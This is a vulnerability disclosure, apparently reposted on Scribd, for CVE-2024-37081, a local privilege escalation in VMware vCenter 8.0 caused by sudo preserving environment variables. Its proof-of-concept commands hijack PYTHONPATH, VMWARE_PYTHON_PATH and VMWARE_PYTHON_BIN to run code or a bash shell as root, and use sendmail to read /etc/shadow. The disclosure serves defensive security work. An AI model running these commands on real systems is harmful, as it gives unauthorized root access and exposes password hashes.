Scribd
Upload
19 views

Vmware Vcenter Disclosures: Environment

dhgf

Uploaded by

Nguyễn Xuân Tiến
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
19 views

Vmware Vcenter Disclosures: Environment

dhgf

Uploaded by

Nguyễn Xuân Tiến
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

VMware vCenter Disclosures

Version 8.0.0.10200

Environment:
- VMware vCenter 8.0.0.10200
- Photon Linux

Findings:
1. CVE-2024-37081: VMware vCenter Multiple Local Privilege
Escalation
Description:
Due to a misconfiguration in the “/etc/sudoers” file, which allows environmental variables
(e.g. “PYTHONPATH”, “VMWARE_PYTHON_PATH”, etc.) to be preserved when running a
“sudo” command, attackers are able to leverage this in order to run arbitrary system
commands as the root user instead of legitimate python code or trusted binaries.

The following sudo users and/or groups have been determined to be affected by this
vulnerability:

User/Group Type

%operator Group
%admin Group
infraprofile User
vpxd User
sts User
pod User

Proof of Concept:
Due to a misconfiguration in the “Defaults env_keep” parameter of the “/etc/sudoers” file,
users that are allowed to run “sudo” commands can propagate dangerous environmental
variables such as “PYTHONPATH”, “VMWARE_PYTHON_PATH”, VMWARE_PYTHON_BIN and
others which are preserved when running commands as “root”.

By altering the values of these environmental variables before executing the “sudo”
commands, the attacker is able to:

.
1.1. Load malicious python code from arbitrary controlled locations (e.g. “/tmp/”)
resulting in the execution of arbitrary systems command with “root” privileges:
1.1.1. Shell commands as any user that can execute a python script with sudo
(PYTHONPATH):
id
sudo -l
head /usr/lib/applmgmt/support/scripts/get_user_password_status.py
echo -e "import os\nprint('Hexor spwd: PYTHONPATH == ' +
os.environ['PYTHONPATH'])\nos.system('id')\nquit()" > /tmp/spwd.py
export PYTHONPATH=/tmp/
sudo /usr/lib/applmgmt/support/scripts/get_user_password_status.py

Note: In this example we will be using a user that belongs to the “operator” group.

1.1.2. Shell commands as the “pod” user (VMWARE_PYTHON_PATH):


mkdir -p /tmp/appliance/
echo -e "import os\nprint('Hexor __init__: VMWARE_PYTHON_PATH == ' +
os.environ['VMWARE_PYTHON_PATH'])\nos.system('id')\nquit()" > /tmp/appliance/__init__.py
export VMWARE_PYTHON_PATH=/tmp/
sudo install-parameter
1.2. Execute malicious scripts/executable instead of legitimate ones resulting in the
execution of arbitrary systems command with “root” privileges:
Shell commands as a “admin” group user (VMWARE_PYTHON_BIN):
echo '/bin/bash' > /tmp/shell && chmod +x /tmp/shell
export VMWARE_PYTHON_BIN=/tmp/shell
sudo /bin/dcli

1.3. Malicious flags allowed in sudo commands resulting in arbitrary file read with “root”
privileges:
Shell commands as the “vpxd” user (sendmail):
sudo /usr/sbin/sendmail -tf aaa -C/etc/shadow

You might also like